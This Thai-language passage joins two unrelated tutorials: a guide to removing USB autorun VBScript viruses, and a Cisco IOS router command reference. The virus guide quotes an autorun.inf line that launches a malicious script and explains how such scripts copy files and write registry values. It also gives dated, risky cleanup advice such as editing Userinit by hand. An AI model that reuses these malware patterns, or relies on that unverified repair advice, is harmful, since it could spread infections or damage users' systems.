เพื่อที่เวลาเราเอา FlashDrive ไปเสียบเครื่องอื่นถ้ามาเสียบที่บ้าน แล้วไม่ขึ้นรูป ก็มีโอกาศว่า autorun.inf โดนเขียนทับ เราจะได้คลิกขวา ดูว่ามีไวรัสไหม ระวังตัวมากขึ้นหน่อย
2.เวลาเสียบ FlashDrive ควร กด Shift ไว้ด้วยไม่ให้มัน Autorun(ส่วนมากมักจะเปิดไวรัสแบบอัตโนมัติที่เสียบ FlashDrive เข้าไป)
หมายเหตุ
1.ต้องมี File Icon และต้องตั้งค่าให้เรียบร้อยด้วย
2.เมื่อเสียบกับเครื่องที่มี AntiAutorun ตัว Autorun.inf ของเราก็จะหายไปนะครับ เพราะมันโง่แยกไม่ออก ดังน้นระวังหน่อยนะครับ

บทที่สี่ การแก้ไวรัสที่เป็น VBScript
เราจะรู้ได้ยังไงว่้าว่าไวรัสชนิดที่เราติดเป็น VBScript รึเปล่า
ดูใน Autorun.inf ถ้าเป็นรูปแบบ

shellexecute=wscript.exe test.vbs

คือตัวไวรัสในที่นี้คือ test.vbs(อาจจเป็นชื่ออื่น) ซึ่งถ้าเป็น .vbs คือ ไวรัสที่เป็น VBScript
ให้เราเปิด Code ขึ้นมาดูโดยใช้ NotePad เปิดคือเปิด NotePad แล้ว แล้วไปที่ File>Open แล้วไปที่ไดรว์ที่พบ Autorun.inf แล้วพิมพ์ชื่อ File ลงในช่อง File Name
คำสั่งต่างๆใน VBScript

On Error Resume Next

อันนี้จะบอกว่าถ้าเกิด Error ไม่ต้องสนใจให้ทำงานต่อไป

Set dirwin = fso.GetSpecialFolder(0)

อันนี้เป็นคำสั่งที่ให้ dirwin เก็บ Path ของ Windows ทั่วไปคือ C:\Windows

Set dirsystem = fso.GetSpecialFolder(1)

อันนี้เป็นคำสั่งที่ให้ dirsystem เก็บ Path ของ System32 ทั่วไปคือ C:\Windows\System32

Set dirtemp = fso.GetSpecialFolder(2)

อันนี้เป็นคำสั่งที่ให้ dirtemp เก็บ Path ของ Temp ทั่วไปคือ C:\Documents and Settings\ชื่อ Username\Local Settings\Temp

Set c = fso.GetFile(dirsystem & "\wscript.exe")
c.copy

ปกติข้างหน้าจุดจะมีชื่อตัวแปรอยู่(ในที่นี้คือ c) เป็นคำสั่ง copy file โดยมีรูปแบบคำสั่งดังนี้

Set c = fso.GetFile("C:\so.exe")
c.copy("C:\test.exe")

โดยบรรทัดแรกคือFile ต้นฉบับ บรรทัดล่างคือ File ที่ถูกวาง เวลาดูต้องดูด้วยว่าชื่อตัวแปรตรงกันไหม โดยตัวแปรสามารถตั้งชื่อให้แตกต่างกันได้ในที่นี้มีตัวแปร 2 ตัวคือ c และ fso ในที่นี้เป็นการคัดลอก File ที่ชื่อ so.exe จาก C:\ ไปที่ C:\ แต่เปลี่ยนชื่อเป็น test.exe

wscr.RegWrite

อันนี้คือคำสั่งเขียนค่าใน registry โดยมีรูปแบบดังนี้

wscr.RegWrite "ที่อยู่ของค่า regetry",ค่าของ regetry,"ชนิดของ regetry"

โดย wscr เป็นชื่อตัวแปร อาจเปลี่ยนแปลงได้

set tf=fs.createtextfile("C:\flash.vbs",2,true)
tf.write "test"
tf.close

อันนี้เป็นคำสั่งที่ใช้สร้าง Text File โดยมีรูปแบบังนี้

set tf=fs.createtextfile("ที่อยู่+ชื่อ File พร้อมนามสกุล File(ไม่จำเป็นต้องเป็น .txt)",อนุญาติให้เขียนทับหรือไม่,อันนี้ให้เขียนเป็น Unicode หรือไม่(ปกติเป็น ASCII))
tf.write "ข้อความที่ต้องการเขียน(ถ้าเก็บไว้ในตัวแปรให้ลบฟันหนูออกแล้วใส่ชื่อตัวแปร)"
tf.close

หมดแล้วมั้ง ต่อไปนี้เป็นการเชื่อม String

a = "456"
b = "123" & a

อันนี้กำหนดให้ a มีคำว่า 456 อยู่ b มีค่าเป็น 123 และมีค่า a ต่อท้าย โดยเครื่องหมาย & เป็นตัวเชื่อมข้อความกับตัวแปร และชื่อตัวแปรจะไม่มีเครือ่งหมาย " ในที่นี้ b จะมีค่า 123456
อันนี้คงหมดแล้วแหละ

บททีห้าี่ การกู้ค่าRegistry ที่ควรรู้จัก
ในกรณทั่วไป
ให้ใช้ NOD32 Registry Recovery-V1.1.exe(โหลดได้ข้างล่าง) แล้วกด Next ไปเรื่อยๆจนจบ ถ้ามีขึ้นถาม Yes No ก็ตอบ Yes
แล้วเปิด CloseSystemWinXPRestore.reg กด Yes แล้วกด OK

ค่า Registry ที่ไวรัสบางตัวแก้ อันตรายและลบไม่ได้

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

ค่านี้จะลบไม่ได้
ปกติจะเป็น

C:\WINDOWS\system32\userinit.exe,

เปลี่ยนตามที่อยู่ของ Windows ห้ามลบเด็ดขาดแก้ให้เหลืออันนี้อันเดียวพอ ยกเว้น Windows ที่เป็น server พวก 2003 หรือ 2000 เนี่ยไม่แน่ใจ

การแก้ค่า Registry เอง
ให้ลองไปอ่าน ScriptRegistry.pdf ที่อยู่ใน File Rar ข้างล่างดูครับ

บทสุดท้าย การแก้ไวรัสแบบง่ายๆ
วิธีแก้ที่เป็น vbs
อันนี้ไม่ยากนั่งแกะ VBS แล้วก็ดูว่ามันกอปไปไว้ไหนบ้าง แก้ค่า Registry อะไรบ้างเราก็ไปแก้คืนซะส่วนมากก็ทำเป็นค่าตรงข้ามซะ มี 0 กับ 1 ยกเว้น

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

อันนี้ลบไปได้เลย
ไวรัสที่ไม่ใช่ vbs
อันนี้กู้คืนยาก ให้เราเปิด CPE17AntiAutorun1310.exe คลิกขวาที่ Icon ของมันตรง System Tray ไปที่ Windows Command เลือก Call Task Manager ไปที่ Process แล้วให้เรียงตาม Username ให้ End Task ออก จนเหลือ explorer.exe และ ctfmon.exe เท่านั้น(ถ้า End Task บางตัวไม่ได้ก็ไม่เป็นไรปล่อยมันไป) แล้วก็ดูใน Autorun.inf ว่าชื่ออะไรแล้วก็ไปลบ แล้วก็กู้ค่า Registry แล้วคลิกขวาที่ Icon ของAntiAutorunตรง System Tray ไปที่ Windows Command เลือก Call MS Config ไปที่ Start up แล้วเอาตัวที่เรียกจาก Temp และ Windows ออก ยกเว้น
ctfmon.exe
TINTESTP.exe
IMJPMIG.exe
แล้วก็โปรแกรมที่คุณรู้จักเช่น NeroCheck
พื้นฐานแค่นี้แหละ ถ้าคิดว่าไม่แน่ใจก็ใช้ Hijackthis จัดการเก็บ Log Files แล้วไป ตรวจที่ www.hijackthis.de หรือโพสถามที่บอร์ดคอมเช่น Thaiware เป็นต้น

หมายเหตุ การทำคำสั่ง ชื่อ Process หรือ ชื่อ Files ต่างๆ ตัวพิมพ์ใหญ่พิมพ์เล็ก ไม่สำคัญเพราะงั้นไม่ต้องไปสน ดูว่าตัวเดียวกันรึเปล่าก็พอ

รวมคำสั่ง rounter

               ซึ่งจะใช้ในการติดต่อ หรือพูดคุยกับ Router เพื่อสั่งงานให้ Router ทำงานได้อย่างที่ต้องการจากไมโครคอมพิวเตอร์ ฉบับที่ 202 ได้กล่าวถึง วิธีการใช้พอร์ตต่างๆ ของ Router รวมทั้งวิธีการเข้าสู่ภายในของ Router เพื่อการใช้คำสั่งต่างๆ แล้ว ฉบับนี้จะได้กล่าวถึงวิธีการใช้คำสั่งและการจัดตั้ง Configuration เพื่อการเชื่อมต่อ Router ต่อไป


คำสั่งภายใน Router


               Cisco Router มีระบบปฏิบัติการที่ควบคุมการทำงานของ Router คล้ายกับระบบปฏิบัติการที่ใช้กับเครื่องพีซีทั่วไป โดยระบบปฏิบัติการของ Router เราเรียกว่า Cisco IOS ซึ่งเป็นระบบปฏิบัติการที่จะทำให้ท่านสามารถ จัดตั้งค่า Configuration รวมทั้งการบริหารจัดการ Router รวมทั้งอุปกรณ์เชื่อมต่อกับ Router ของ Cisco ได้โดยสะดวก ซึ่งในระบบปฏิบัติการ IOS ของ Cisco นี้ มีคำสั่งที่ทำงานในโหมดต่างๆ หลายโหมดดังต่อไปนี้


Command Mode


        Command Mode หลักภายใน Cisco IOS ได้แก่

• User Exec Mode
• Privileged Exec Mode
• Global Configuration Mode
• Interface Configuration
• Boot Mode

User Exec Mode
            User Exec Mode เป็นโหมดแรกที่ท่านจะต้อง Enter เข้าไป เมื่อRouter เริ่มทำงาน วิธีที่จะรู้ว่าท่านได้เข้าสู่ User Exec Mode จาก Prompt ของ Router ได้แก่ Prompt ที่แสดงบนหน้าจอ ได้แก่ ชื่อของ Router แล้วตามด้วยเครื่องหมาย > เช่น


Routerhostname >
        ต่อไปนี้ เป็นตารางแสดงรายการคำสั่ง ภายใต้ User Exec Commands

ตารางที่ 1แสดงรายการคำสั่ง ภายใต้ User Exec Commands


คำสั่ง


access-enable
เป็นการสร้าง Access List entry ชั่วคราว


clear

เป็นการ reset ค่า configure ต่างๆที่ท่านสร้างขึ้นชั่วคราว



connect

ใช้เพื่อ เปิด connection กับ terminal



disable

ปิดหรือยกเลิกคำสั่งที่อยู่ใน Privileged mode



disconnect

ยกเลิกการเชื่อมต่อใดๆกับ network



enable

เข้าสู่ privileged Exec mode



exit

ออกจากการใช้ User Exec mode



help

ใช้เพื่อแสดงรายการ help



lat

เปิดการเชื่อมต่อกับ LAT (เครือข่าย VAX)



lock

ใช้เพื่อ lock terminal



login

loginเข้ามาเป็น user



logout

exit ออกจาก EXEC



mrinfo

ใช้เพื่อการร้องขอข้อมูลข่าวสารเกี่ยวกับ Version และสถานะของ Router เพื่อนบ้านจาก multicast router ตัวหนึ่ง



mstat
แสดงสถิติหลังจากที่ได้ตามรอยเส้นทางแบบ Multicast ของ Router แล้ว



mtrace

ใช้ติดตามดู เส้นทาง Multicast แบบย้อนกลับจาก ปลายทางย้อนกลับมาที่ต้นทาง



name-connection

เป็นการให้ชื่อกับ การเชื่อมต่อของเครือข่ายที่กำลังดำเนินอยู่



pad

เปิดการเชื่อมต่อ X.25 ด้วย X.29 PAD



Ping

ใช้เพื่อทดสอบการเชื่อมต่อ



ppp

ใช้เรียกการเชื่อมต่อแบบ PPP



resume

ใช้เพื่อการ กลับเข้าสู่การเชื่อมต่อของเครือข่ายอีกครั้ง



rlogin

เปิดการเชื่อมต่อ remote Login กับ Server ระยะไกล



show

แสดงข้อมูลข่าวสารเกี่ยวกับการทำงานของ Router ในปัจจุบัน



slip

เริ่มการใช้งาน Slip (serial line protocol)



systat

เป็นการแสดงข้อมูลข่าวสารเกี่ยวกับ Terminal Line เช่นสถานะของระบบ



telnet

เป็นการเปิด การเชื่อมต่อทาง Telnet



terminal

เป็นการจัด Parameter ของ Terminal Line



traceroute

เป็นการใช้ Traceroute เพื่อการติดตามไปดู ระบบที่อยู่ปลายทาง



tunnel

เปิดการเชื่อมต่อแบบ Tunnel



where

แสดงรายการ ของ Link ที่กำลัง Active ในปัจจุบัน

Privileged Exec Mode
เป็น โหมดที่ทำให้ท่านสามารถเปลี่ยนแปลง ค่า Configuration ในตัว Router เมื่อใดที่ท่านเข้าสู่โหมดนี้ไปแล้ว ท่านจะสามารถเข้าสู่การทำงานของโหมดอื่น เพื่อการเปลี่ยนค่า Configuration รวมทั้งขอบข่ายการทำงานของ Router ได้โดยง่าย
วิธีการเข้าสู่ Privileged Exec Mode ได้แก่การใช้คำสั่ง enable ขณะที่ท่านยังอยู่ใน User Exec Mode แต่ส่วนใหญ่เมื่อท่านกำลังจะเข้าสู่ Privileged Exec Mode ท่านมักจะได้รับการร้องขอให้ใส่รหัสผ่าน หากท่านสามารถใส่รหัสผ่านได้ถูกต้อง ท่านจะได้เห็น Prompt ใหม่เกิดขึ้น นั่นแสดงว่า ท่านสามารถเข้าสู่โหมดนี้ได้แล้ว ท่านจะได้เห็นชื่อของ Router รวมทั้งเครื่องหมายของ Prompt ที่เป็นรูป # เช่น





myrouter#
Privileged Mode จะทำให้ท่านสามารถ Access เข้าไปที่โหมดต่างๆ ของ Router ทั้งนี้ขึ้นอยู่กับชุดของระบบปฏิบัติการที่ท่านใช้อยู่ ต่อไปนี้เป็นคำสั่งที่ท่านจะได้พบ หรือสามารถนำมาใช้งานได้บน Privileged Mode นี้

ตารางที่ 2 คำสั่งที่อยู่ใน Privileged Mode

คำสั่ง






Access-enable

เป็นการสร้าง Access List แบบชั่วคราว



Access-template

สร้าง Access List แบบชั่วคราว



Clear

เป็นคำสั่งที่ใช้เคลียร์ หน้าที่การทำงานต่างๆออกทั้งหมด



Clock

จัดการระบบนาฬิกาของระบบ



Configure

เข้าสู่ Configure Mode



Connect

เปิดการเชื่อมต่อ Terminal



Copy

เป็นการคัดสำเนาค่า Configuration และข้อมูล



Debug

เป็นการใช้คำสั่ง debug



Disable

เป็นการยกเลิก Privileged Mode



Disconnect

ใช้เพื่อการ Disconnect การเชื่อมต่อของเครือข่ายที่กำลังดำเนินอยู่ในปัจจุบัน



Enable

ใช้เพื่อเปิดการเข้าสู่ privileged mode



Erase

ใช้เพื่อการลบข้อมูลใน Flash หรือหน่วยความจำที่เก็บ Configuration ใน Router



Exit

ใช้เพื่อออกจาก EXEC mode



Help

คำสั่ง help



Login

ใช้เพื่อการ log on เข้าสู่ระบบ



Logout

ใช้เพื่อการออกจาก EXEC



Mrinfo

ใช้เพื่อการร้องขอข้อมูลข่าวสารจาก Multicast Router



Mstat

แสดงสถิติหลังจากที่ได้ติดตามดูเส้นทางของ Router ต่างๆ



Mtrace

ใช้เพื่อติดตามดู เส้นทางแบบย้อนกลับ จากปลายทางมายังต้นทาง



Name-connection

ใช้เพื่อการตั้งชื่อ ให้กับเครือข่ายที่กำลังเชื่อมต่ออยู่



Ncia

ใช้เพื่อการ Start และหยุดการทำงานของ NCIA Server



No

ใช้เพื่อ disable function การทำงานของคำสั่ง debugging



Pad

ใช้เพื่อเปิด X.29 PAD Connection



Ping

ใช้เพื่อทดสอบการเชื่อมต่อด้วย Echo Message



ppp

ใช้เพื่อ Start การทำงานของ PPP



reload

ใช้เพื่อหยุดและ restart แบบ Cold Start (Reset ตัวเองแล้วเริ่มทำงานใหม่)



resume

Resume การเชื่อมต่อกับเครือข่ายที่กำลัง Active อยู่



rlogin

ใช้เพื่อเปิดการเชื่อมต่อ ด้วย rlogin



rsh

ใช้เพื่อ execute คำสั่งแบบ Remote (การใช้คำสั่งทำงานบน Host อื่นแบบ Remote)



sdlc

ใช้เพื่อการส่ง SDLC Test Frame



send

ใช้เพื่อส่ง Message ไปที่ tty Line อื่นๆ



setup

ใช้เพื่อ Run คำสั่งการ Setup



show

ใช้เพื่อแสดงข้อมูลข่าวสาร ที่กำลังทำงานอยู่บน Router



slip

ใช้เพื่อ Start การทำงานของ Serial Line IP (SLIP)



start-chat

ใช้เพื่อ start chat สคริปบนสาย



systat

ใช้เพื่อแสดงข้อมูลข่าวสารเกี่ยวกับ Terminal Line



telnet

ใช้เพื่อเริ่มการทำงานของ Telnet



terminal

ใช้เพื่อจัดตั้ง Parameter ของ Terminal Line



test

มีไว้เพื่อการทดสอบ ระบบภายใน รวมทั้งหน่วยความจำและ Interface



traceroute

เป็นการใช้คำสั่ง Traceroute กับอุปกรณ์หรือ Host ปลายทาง



tunnel

เป็นการเปิดการเชื่อมต่อแบบ Tunnel



undebug

ใช้เพื่อยกเลิก การใช้ Debug



verify

ใช้เพื่อ Verify ความถูกต้องของ File ที่อยู่ใน Flash Memory



where

ใช้แสดงรายการ Connection ที่ยัง Active อยู่ในปัจจุบัน



which-route

ใช้เพื่อค้นหาดู route table และแสดงผลออกมาให้ดู



write

ใช้เพื่อ Save ค่า Configuration ไปที่ Memory เครือข่าย หรือ Terminal



x3

ใช้เพื่อจัดตั้ง X.3 Parameter บน PAD



xremote

เข้าสู่ Xremote mode

Global Configuration Mode

ตารางที่3 คำสั่งที่อยู่ใน Global Configuration Mode


คำสั่ง



aaa

Authentication Authorization และ Accounting



access-list

ใช้เพื่อเพิ่มเติมค่าใน Access list



alias

ใช้เพื่อสร้าง Command Alias (ใช้เพื่อสร้างคำสั่งใหม่จากคำสั่งเดิมที่มีอยู่)



apollo

คำสั่ง Apollo Global configuration Command



appletalk

คำสั่ง Global Configuration สำหรับ เครื่อง Appletalk



arap

Appletalk Remote Access Protocol



arp

เป็นการตั้งค่า arp ในตาราง arp



async-bootp

ใช้เพื่อ modify Parameter การทำงานของ Bootp



autonomous-system

ใช้เพื่อกำหนดเจาะจงเลขหมาย AS ว่าขึ้นอยู่กับใคร



banner

ใช้เพื่อนิยามการทำงานของ login banner



boot

ใช้เพื่อ Modify Boot Parameter



buffers

ใช้เพื่อการปรับแต่ง Parameter (ขนาด) ของ System Buffer



busy-message

ใช้เพื่อแสดงข้อมูลข่าวสารต่างๆเมื่อการเชื่อมต่อกับ Host ล้มเหลว



cdp

เป็นคำสั่งย่อย สำหรับการจัดตั้ง Global CDP Configuration



chat-script

ใช้เพื่อกำหนดลักษณะการทำงานของ Modem Chat Scripts



clns

เป็นคำสั่งย่อยสำหรับจัด Configured ให้กับ Global CLNS



clock

ใช้เพื่อจัด Configure เกี่ยวกับ เวลา วัน เดือน ปี



config-register

ใช้เพื่อจัดตั้ง Configuration Register



default

กำหนดให้ Command line มีค่าเป็น Default



default-value

ใช้เพื่อกำหนดให้ ค่า ของ Character Bit


dialer-list

ใช้เพื่อการสร้าง dialer list entry



enable

ใช้เพื่อ Modify enable password parameter



end

ออกจาก Configure Mode



exit

เป็นการออกจาก Configure Mode



help

แสดง Help Menu



hostname

จัดตั้งชื่อ network ให้กับระบบ



interface

ใช้เพื่อเลือก Interface ที่ต้องการจะจัด Configure



ip

เป็นคำสั่งย่อยสำหรับการจัด Configure Global IP



ipx

เป็นคำสั่งสำหรับการจัด Configure ให้กับ Global ipx



kerberos

ใช้เพื่อการจัด Configure ให้ระบบรักษาความปลอดภัย แบบ Kerberos



key

key Management



keymap

ใช้เพื่อการตั้งค่า Keymap ใหม่



line

ใช้เพื่อการจัดตั้ง configure สำหรับ Terminal Line



login-string

ใช้เพื่อนิยาม login string อย่างเจาะจงเฉพาะ host



map-class

ใช้เพื่อการจัด Configure static map class



map-list

ใช้เพื่อการจัด configure static map list



menu

ใช้เพื่อการจัดตั้ง User Interface Menu



modemcap

ฐานข้อมูลสำหรับเก็บค่าที่แสดงความสามารถของ Modem



multilink

การจัด Configuration ให้กับ PPP Multilink



netbios

การควบคุมการ access โดย NETBIOS



partition

ใช้เพื่อแบ่ง partition ของอุปกรณ์



priority-list

ใช้เพื่อการสร้าง priority list



prompt

ใช้เพื่อการตั้ง Prompt ให้กับระบบ



queue-list

ใช้เพื่อการสร้างรายการ queue แบบ manual



rlogin

เป็นคำสั่งที่ใช้ login เข้าไปที่ host ระยะไกล



rmon

เรียกการทำงาน ของ remote monitoring ออกมาใช้งาน



router

ใช้เพื่อ ทำให้กระบวนการ routing เริ่มทำงาน
คำ สั่งในโหมดการทำงานต่างๆที่กล่าวมาทั้งหมดนี้ เป็นเพียงส่วนหนึ่งเท่านั้น เนื่องจากเนื้อที่กระดาษจำกัด จึงขอกล่าวถึงเพียงเท่านี้ก่อน





การใช้ Key ต่างๆ ใน Cisco IOS


คำสั่งเลื่อน Cursor ถอยหลังกลับ

• Ctrl-B เลื่อน Cursor ถอยหลังกลับมา 1 ตัวอักษร
• Esc-B ถอย Cursor มา 1 Word
• Ctrl-A เลื่อน Cursor ไปยังจุดเริ่มต้นของบรรทัด

คำสั่งเลื่อน Cursor ไปข้างหน้า

• Ctrl-F เลื่อน Cursor ไปข้างหน้า 1 ตัวอักษร
• Esc-F เลื่อน Cursor ไปข้างหน้า 1 Word
• Ctrl-E เลื่อน Cursor ไปที่ปลายสุดของบรรทัด

คำสั่งลบตัวอักษร

• Delete ลบตัวอักษรที่เพิ่งจะใส่เข้าไป
• Ctrl-D ลบตัวอักษรที่อยู่กับ Cursor
• Ctrl-K ลบตัวอักษรทั้งหมดจากตำแหน่งของ Cursor ไปที่ปลายสุดของบรรทัด

คำสั่งที่ใช้เรียกคำสั่งที่ใช้ไปแล้วออกมา

• Ctrl-P เรียกคำสั่งที่ใช้มาแล้วออกมาดู
• Ctrl-N ใช้ร่วมกับ Ctrl-P เป็นลำดับเพื่อเรียกคำสั่งย้อนหลังออกมาดูทุกตัว

[/url]

การใช้คำสั่งเพื่อตรวจสอบสถานะของ Router


ต่อ ไปนี้ เป็นคำสั่งที่ท่านสามารถนำมาใช้เพื่อการตรวจสอบสถานะการทำงานของ Cisco Router โดยที่คำสั่งเหล่านี้ ยังช่วยให้ท่านสามารถเฝ้าดู และตรวจสอบหาจุดเสียที่เกิดขึ้นกับ Router ดังกล่าวได้อีกด้วย

คำสั่งที่ใช้เพื่อแสดงสถานะของ Router มีดังนี้





คำสั่ง






show Version

เป็น คำสั่งที่ใช้แสดงการจัด Configuration ของระบบ Hardware เช่น Version ของ Software ที่ใช้ใน Router ชื่อของ Configuration File อันเป็นต้นฉบับ รวมทั้ง Boot Images



show Processes

ใช้เพื่อแสดงข้อมูลข่าวสารเกี่ยวกับ โปรเซสที่กำลังเกิดขึ้น และยังดำเนินการอยู่ทั้งหมดภายใน Router



show Protocols

ใช้ แสดง Protocol ใน Router ที่ได้รับการจัด Configured เรียบร้อยแล้วโดยคำสั่งนี้ จะทำการแสดง Protocol ที่ทำงานในระดับชั้น Layer 3(Network Layer) ของ OSI Model



show Memory

ใช้เพื่อการแสดงข้อมูลข่าวสารเกี่ยวกับหน่วยความจำในตัว Router รวมทั้งปริมาณของหน่วยความจำที่เหลือจากการใช้งาน



show ip route

ใช้เพื่อการแสดงข้อมูลข่าวสารที่อยู่ใน ตารางเลือกเส้นทาง (Routing Table)



show flash

แสดงข้อมูลข่าวสารเกี่ยวกับ อุปกรณ์ประเภท Flash Memory



show running-config
ใช้เพื่อการแสดงค่าพารามิเตอร์ของ Configuration ต่างๆที่กำลังทำงานกันอยู่ในขณะนี้



show startup-config

ใช้เพื่อการแสดง File ที่ใช้ backup ค่า Configuration ต่างๆ



show interfaces
ใช้เพื่อการแสดงสถิติของ Interface ทั้งหมดที่ได้จัดตั้ง Configured เรียบร้อยแล้วบน Router







คำสั่ง show versions


Router# show version

IOS (tm) 2500 Software (C2500-JS-L), Version 11.2 (6) RELEASE SOFTWARE (fcl)

Copyright (c) 1986-1997 by cisco Systems, inc.

Compiled Tue 06-MAY-97 16:17 by Kuong

Image text base: 0x0303ED8C, data-base: 0x00001000

ROM: System Bootstrap, Version 5.2 (8a), RELEASE SOFTWARE

ROM: 2500-XBOOT Bootstrap Software, Version 10.1 (1), RELEASE SOFTWARE (fcl)

Router uptime is 1 week, 3 days, 32 minutes

System start by reload

System image file is "c2500-js-1", booted via tffp from 171.69.1.129

----- more -----
คำอธิบายเพิ่มเติม
ข้อมูล ข่าวสารจาก show version มีความสำคัญมาก หากท่านได้มีการ Upgrade Software บน Router ของท่าน หรือในกรณีที่ท่านต้องการจะค้นหาจุดเสีย
สังเกตว่า คำสั่งนี้มิเพียงแต่แสดงข้อมูลข่าวสารเกี่ยวกับ Version ของ Software ที่ท่านกำลังใช้งานใน Router เท่านั้น แต่ยังแสดงสถิติถึงระยะเวลาที่ท่านได้เปิด router ตัวนี้ ใช้งาน รวมทั้งชื่อของ image File

[url=http://micro.se-ed.com/content/mc203/Mc203_157.asp#mc2]

คำสั่ง show startup-config


Router# show startup-config
Using 1108 out of 130048 bytes
!
version 11.2
!
hostname router
------ more -----
คำ สั่ง show startup-config เป็นคำสั่งที่ทำให้ผู้บริหารเครือข่าย สามารถมองเห็น ขนาดของ image และคำสั่ง Startup configuration ที่จะถูกนำมาใช้ในครั้งต่อไปที่มีการ Start ตัว router





คำสั่ง show interfaces




คำ สั่ง show interfaces เป็นคำสั่งที่ใช้แสดงค่าพารามิเตอร์ที่ได้ถูกจัดตั้งไว้แล้ว รวมทั้งสถิติการทำงานของ อินเทอร์เฟส แบบเวลาจริงที่เกิดขึ้นบน router ในขณะนั้น คำสั่งนี้มีประโยชน์มาก ในการใช้เพื่อติดตามดูอินเทอร์เฟส ชนิดเจาะจง หรือเพื่อดูการเปลี่ยนแปลงที่เกิดขึ้น หลังจากที่ได้เปลี่ยนแปลง Configuration ของ อินเทอร์เฟสไปแล้ว ข้อมูลอันเป็นสถิติที่ท่านจะได้จาก router หลังจากที่เรียกคำสั่งนี้ มีดังนี้

• สถานะของ Interface
• ค่า maximum transmission unit ของอินเทอร์เฟส (ค่า Maximum Transmission Unit หรือ MTU เป็นค่าที่กำหนดขนาดของเฟรมหรือ แพ็กเก็ตที่ Router จะอนุญาติให้วิ่งผ่านได้โดยไม่ต้องมีการทำแฟลกเมนต์ หรือแบ่งขนาดของแพ็กเก็ตออกเป็นส่วนๆ)
• ค่าไอพีแอดเดรสของอินเทอร์เฟส
• แสดง MAC Address ของ LAN Card
• ชนิดของ Encapsulation ที่ใช้
• จำนวนของแพ็กเก็ตที่ได้รับมาทั้งหมด
• จำนวนของแพ็กเก็ตที่เกิดความผิดพลาด ขณะที่วิ่งเข้าวิ่งออกจาก Router
• จำนวนของ Collision ที่ถูกตรวจพบ (หากอินเทอร์เฟสที่ใช้เป็นระบบอีเทอร์เน็ต)
• คำ สั่ง Show interface เป็นคำสั่งที่มีประโยชน์มาก ในการพิสูจน์ดูการทำงานของ Router อีกทั้งสามารถตรวจสอบความผิดพลาด จากการทำงานของ Router และเครือข่าย ต่อไปนี้เป็นหน้าจอที่แสดงข่าวสาร หลังจากใช้คำสั่ง show interface

Router#show interfaces
Serial0 is up, line protocol is up

Hardware is MK5025
Internet address is 183.8.64.129, subnet mask is 255.255.255.128
MTU 1500 bytes, BW 56 kbit, DLY 20000 usec, rely 255/255, load 9/255
Encapsulation HDLC, loopback not set, keepalive set (10 sec)
Last input 0:00:00, output 0:00:01, output hang never
Last clearing of "show interface" counters never
Output queue 0/40, 0 drops:input queue 0/75, 0 drops
Five minute input rate 1000 bits/sec, 0 packets/sec
Five minute output rate 2000 bits/sec, 0 no buffer

331885 packets input, 62400237 bytes, 0 no buffer
Received 230457 broadcasts, 0 runts, 0 giants
3 input errors, 3 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
403591 packets output, 66717279 byres, 0 underruns
0 output errors, 0 collisions, 8 interface resets, 0 restarts
45 carrier transitions
ที่ กล่าวมาทั้งหมดนี้เป็นเพียงตัวอย่างของการใช้คำสั่งที่สำคัญสำหรับ Router Cisco ซึ่งท่านที่จะดูแลระบบเครือข่ายอาจต้องพิจารณาศึกษาการใช้คำสั่งต่างๆ เพื่อประโยชน์การใช้งาน Router สูงสุด